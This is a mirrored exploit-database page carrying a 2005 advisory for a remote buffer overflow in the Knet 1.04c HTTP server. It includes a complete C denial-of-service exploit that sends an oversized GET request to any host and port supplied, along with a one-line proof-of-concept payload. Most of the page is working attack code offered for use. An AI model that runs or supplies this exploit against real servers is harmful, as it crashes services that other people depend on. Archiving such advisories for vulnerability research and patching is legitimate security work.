Vulners
Lucene search
Knet <= 1.04c Buffer Overflow Denial of Service Exploit
=======================================================
Knet <= 1.04c Buffer Overflow Denial of Service Exploit
=======================================================
-=[--------------------ADVISORY-------------------]=-
-=[
]=-
-=[ Knet <= 1.04c ]=-
-=[
]=-
-=[ Author: CorryL [[email protected]] ]=-
-=[ x0n3-h4ck.org ]=-
-=[----------------------------------------------------]=-
-=[+] Application: Knet
-=[+] Version: 1.04c
-=[+] Vendor's URL: www.stormystudios.com
-=[+] Platform: Windows
-=[+] Bug type: Buffer overflow
-=[+] Exploitation: Remote
-=[-]
-=[+] Author: CorryL ~ CorryL[at]gmail[dot]com ~
-=[+] Reference: www.x0n3-h4ck.org
..::[ Descriprion ]::..
Knet is an small http server,easy installation and use.
..::[ Bug ]::..
This software is affected a Buffer Overflow.
A malitious attacker sending the request GET AAAAAA..... to 522,
this cause the overwrite of the eip registry,causing the execution of
malicious code.
..::[ Proof Of Concept ]::..
GET AAAAAAAAAAAAAAAAAAAAAAAAAA......... to 522 byte long
..::[ Exploit ]::..
/*
KNet <= 1.04c is affected to a remote buffer overflow in GET command.
This PoC demostrate the vulnerability.
KNet <= 1.04c PoC Denial Of Service Coded by: Expanders
Usage: ./x0n3-h4ck_Knet-DoS.c <Host> <Port>
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
void help(char *program_name);
int main(int argc, char *argv[]) {
struct sockaddr_in trg;
struct hostent *he;
long addr;
int sockfd, buff,rc;
char evilbuf[1024];
char buffer[1024];
char *request;
if(argc < 3 ) {
help(argv[0]);
exit(0);
}
printf("\n\n-=[ KNet <= 1.04c PoC DoS ::: Coded by Expanders ]=-\n");
he = gethostbyname(argv[1]);
sockfd = socket(AF_INET, SOCK_STREAM, 0);
request = (char *) malloc(12344);
trg.sin_family = AF_INET;
trg.sin_port = htons(atoi(argv[2]));
trg.sin_addr = *((struct in_addr *) he->h_addr);
memset(&(trg.sin_zero), '\0', 8);
printf("\n\nConnecting to target \t...");
rc=connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr_in));
if(rc==0)
{
printf("[Done]\nBuilding evil buffer\t...");
memset(evilbuf,90,1023);
printf("[Done]\nSending evil request \t...");
sprintf(request,"GET %s \n\r\n\r",evilbuf);
send(sockfd,request,strlen(request),0);
printf("[Done]\n\n[Finished] Check the server now\n");
}
else
printf("[Fail] -> Unable to connect\n\n");
close(sockfd);
return 0;
}
void help(char *program_name) {
printf("\n\t-=[ KNet <= 1.04b PoC Denial Of Service ]=-\n");
printf("\t-=[ ]=-\n");
printf("\t-=[ Coded by ders -/www.x0n3-h4ck.org\\- ]=-\n\n");
printf("Usage: %s <Host> <Port>\n",program_name);
}
# 0day.today [2018-01-02] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Feb 2005 00:00Current
7High risk
Vulners AI Score7